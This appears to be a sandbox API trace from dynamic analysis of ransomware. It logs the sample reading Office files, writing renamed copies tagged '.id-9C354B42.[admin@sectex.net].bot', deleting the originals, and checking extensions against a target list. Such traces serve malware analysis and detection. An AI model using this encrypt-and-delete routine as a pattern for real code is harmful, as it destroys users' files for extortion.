	[0147.995] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x280, lpOverlapped=0x0) returned 1
	[0147.996] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.996] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0147.996] SetEndOfFile (hFile=0x384) returned 1
	[0148.116] CloseHandle (hObject=0x384) returned 1
	[0148.120] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.120] SetEndOfFile (hFile=0x268) returned 1
	[0148.122] CloseHandle (hObject=0x268) returned 1
	[0148.122] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.129] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_col.hxc")) returned 1
	[0148.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC") returned 64
	[0148.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC") returned 64
	[0148.130] lstrlenW (lpString=".doc") returned 4
	[0148.130] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0148.130] lstrlenW (lpString=".docx") returned 5
	[0148.130] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0148.130] lstrlenW (lpString=".pdf") returned 4
	[0148.130] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0148.130] lstrlenW (lpString=".xls") returned 4
	[0148.130] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0148.130] lstrlenW (lpString=".xlsx") returned 5
	[0148.130] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0148.130] lstrlenW (lpString=".ppt") returned 4
	[0148.130] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0148.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC") returned 64
	[0148.130] lstrlenW (lpString=".zip") returned 4
	[0148.130] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0148.130] lstrlenW (lpString=".rar") returned 4
	[0148.130] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0148.130] lstrlenW (lpString=".bz2") returned 4
	[0148.130] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0148.130] lstrlenW (lpString=".7z") returned 3
	[0148.130] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0148.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC") returned 64
	[0148.131] lstrlenW (lpString=".dbf") returned 4
	[0148.131] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0148.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC") returned 64
	[0148.131] lstrlenW (lpString=".1cd") returned 4
	[0148.131] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0148.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC") returned 64
	[0148.131] lstrlenW (lpString=".jpg") returned 4
	[0148.131] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0148.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC") returned 64
	[0148.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC") returned 64
	[0148.131] lstrlenW (lpString=".doc") returned 4
	[0148.131] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0148.131] lstrlenW (lpString=".docx") returned 5
	[0148.131] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0148.131] lstrlenW (lpString=".pdf") returned 4
	[0148.131] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0148.131] lstrlenW (lpString=".xls") returned 4
	[0148.131] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0148.131] lstrlenW (lpString=".xlsx") returned 5
	[0148.131] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0148.131] lstrlenW (lpString=".ppt") returned 4
	[0148.131] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0148.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC") returned 64
	[0148.131] lstrlenW (lpString=".zip") returned 4
	[0148.131] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0148.131] lstrlenW (lpString=".rar") returned 4
	[0148.131] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0148.131] lstrlenW (lpString=".bz2") returned 4
	[0148.131] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0148.131] lstrlenW (lpString=".7z") returned 3
	[0148.131] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0148.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC") returned 64
	[0148.132] lstrlenW (lpString=".dbf") returned 4
	[0148.132] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0148.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC") returned 64
	[0148.132] lstrlenW (lpString=".1cd") returned 4
	[0148.132] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0148.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC") returned 64
	[0148.132] lstrlenW (lpString=".jpg") returned 4
	[0148.132] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0148.132] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0148.132] lstrlenW (lpString="MSPUB.DEV_F_COL.HXK") returned 19
	[0148.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0148.132] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=114) returned 1
	[0148.132] CloseHandle (hObject=0x268) returned 1
	[0148.133] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_f_col.hxk")) returned 0x20
	[0148.133] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0148.133] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.133] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0148.134] GetLastError () returned 0x0
	[0148.134] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x72, lpOverlapped=0x0) returned 1
	[0148.135] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0148.135] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.136] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0148.136] SetEndOfFile (hFile=0x3b0) returned 1
	[0148.136] CloseHandle (hObject=0x3b0) returned 1
	[0148.136] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.136] SetEndOfFile (hFile=0x268) returned 1
	[0148.138] CloseHandle (hObject=0x268) returned 1
	[0148.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.139] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_f_col.hxk")) returned 1
	[0148.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK") returned 67
	[0148.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK") returned 67
	[0148.139] lstrlenW (lpString=".doc") returned 4
	[0148.139] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.139] lstrlenW (lpString=".docx") returned 5
	[0148.139] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.139] lstrlenW (lpString=".pdf") returned 4
	[0148.139] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.139] lstrlenW (lpString=".xls") returned 4
	[0148.139] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.139] lstrlenW (lpString=".xlsx") returned 5
	[0148.139] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.139] lstrlenW (lpString=".ppt") returned 4
	[0148.139] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK") returned 67
	[0148.140] lstrlenW (lpString=".zip") returned 4
	[0148.140] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.140] lstrlenW (lpString=".rar") returned 4
	[0148.140] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.140] lstrlenW (lpString=".bz2") returned 4
	[0148.140] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.140] lstrlenW (lpString=".7z") returned 3
	[0148.140] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK") returned 67
	[0148.140] lstrlenW (lpString=".dbf") returned 4
	[0148.140] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK") returned 67
	[0148.140] lstrlenW (lpString=".1cd") returned 4
	[0148.140] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK") returned 67
	[0148.140] lstrlenW (lpString=".jpg") returned 4
	[0148.140] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK") returned 67
	[0148.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK") returned 67
	[0148.140] lstrlenW (lpString=".doc") returned 4
	[0148.140] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.140] lstrlenW (lpString=".docx") returned 5
	[0148.140] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.140] lstrlenW (lpString=".pdf") returned 4
	[0148.140] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.140] lstrlenW (lpString=".xls") returned 4
	[0148.140] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.140] lstrlenW (lpString=".xlsx") returned 5
	[0148.140] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.140] lstrlenW (lpString=".ppt") returned 4
	[0148.140] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK") returned 67
	[0148.141] lstrlenW (lpString=".zip") returned 4
	[0148.141] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.141] lstrlenW (lpString=".rar") returned 4
	[0148.141] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.141] lstrlenW (lpString=".bz2") returned 4
	[0148.141] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.141] lstrlenW (lpString=".7z") returned 3
	[0148.141] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK") returned 67
	[0148.141] lstrlenW (lpString=".dbf") returned 4
	[0148.141] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK") returned 67
	[0148.141] lstrlenW (lpString=".1cd") returned 4
	[0148.141] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK") returned 67
	[0148.141] lstrlenW (lpString=".jpg") returned 4
	[0148.141] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.141] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0148.141] lstrlenW (lpString="MSPUB.DEV_K_COL.HXK") returned 19
	[0148.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0148.142] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=113) returned 1
	[0148.142] CloseHandle (hObject=0x268) returned 1
	[0148.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_k_col.hxk")) returned 0x20
	[0148.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0148.142] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.142] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0148.143] GetLastError () returned 0x0
	[0148.143] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x71, lpOverlapped=0x0) returned 1
	[0148.144] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0148.145] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.145] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0148.145] SetEndOfFile (hFile=0x3b0) returned 1
	[0148.145] CloseHandle (hObject=0x3b0) returned 1
	[0148.146] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.146] SetEndOfFile (hFile=0x268) returned 1
	[0148.148] CloseHandle (hObject=0x268) returned 1
	[0148.148] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.148] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_k_col.hxk")) returned 1
	[0148.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK") returned 67
	[0148.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK") returned 67
	[0148.150] lstrlenW (lpString=".doc") returned 4
	[0148.150] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.150] lstrlenW (lpString=".docx") returned 5
	[0148.150] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.150] lstrlenW (lpString=".pdf") returned 4
	[0148.151] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.151] lstrlenW (lpString=".xls") returned 4
	[0148.151] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.151] lstrlenW (lpString=".xlsx") returned 5
	[0148.151] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.151] lstrlenW (lpString=".ppt") returned 4
	[0148.151] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK") returned 67
	[0148.151] lstrlenW (lpString=".zip") returned 4
	[0148.151] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.151] lstrlenW (lpString=".rar") returned 4
	[0148.151] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.151] lstrlenW (lpString=".bz2") returned 4
	[0148.151] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.151] lstrlenW (lpString=".7z") returned 3
	[0148.151] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK") returned 67
	[0148.151] lstrlenW (lpString=".dbf") returned 4
	[0148.151] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK") returned 67
	[0148.151] lstrlenW (lpString=".1cd") returned 4
	[0148.151] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK") returned 67
	[0148.151] lstrlenW (lpString=".jpg") returned 4
	[0148.151] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK") returned 67
	[0148.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK") returned 67
	[0148.151] lstrlenW (lpString=".doc") returned 4
	[0148.151] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.152] lstrlenW (lpString=".docx") returned 5
	[0148.152] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.152] lstrlenW (lpString=".pdf") returned 4
	[0148.152] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.152] lstrlenW (lpString=".xls") returned 4
	[0148.152] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.152] lstrlenW (lpString=".xlsx") returned 5
	[0148.152] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.152] lstrlenW (lpString=".ppt") returned 4
	[0148.152] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK") returned 67
	[0148.152] lstrlenW (lpString=".zip") returned 4
	[0148.152] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.152] lstrlenW (lpString=".rar") returned 4
	[0148.152] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.152] lstrlenW (lpString=".bz2") returned 4
	[0148.152] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.152] lstrlenW (lpString=".7z") returned 3
	[0148.152] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK") returned 67
	[0148.152] lstrlenW (lpString=".dbf") returned 4
	[0148.152] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK") returned 67
	[0148.152] lstrlenW (lpString=".1cd") returned 4
	[0148.152] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK") returned 67
	[0148.152] lstrlenW (lpString=".jpg") returned 4
	[0148.152] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.153] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0148.153] lstrlenW (lpString="MSPUB.HXS") returned 9
	[0148.153] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0148.153] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1886518) returned 1
	[0148.153] CloseHandle (hObject=0x268) returned 1
	[0148.153] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.hxs")) returned 0x20
	[0148.153] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.153] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0148.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS") returned 57
	[0148.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS") returned 57
	[0148.154] lstrlenW (lpString=".doc") returned 4
	[0148.154] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0148.154] lstrlenW (lpString=".docx") returned 5
	[0148.154] lstrcmpiW (lpString1=".docx", lpString2="B.HXS") returned -1
	[0148.154] lstrlenW (lpString=".pdf") returned 4
	[0148.154] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0148.154] lstrlenW (lpString=".xls") returned 4
	[0148.154] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0148.154] lstrlenW (lpString=".xlsx") returned 5
	[0148.154] lstrcmpiW (lpString1=".xlsx", lpString2="B.HXS") returned -1
	[0148.154] lstrlenW (lpString=".ppt") returned 4
	[0148.154] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0148.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS") returned 57
	[0148.154] lstrlenW (lpString=".zip") returned 4
	[0148.154] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0148.154] lstrlenW (lpString=".rar") returned 4
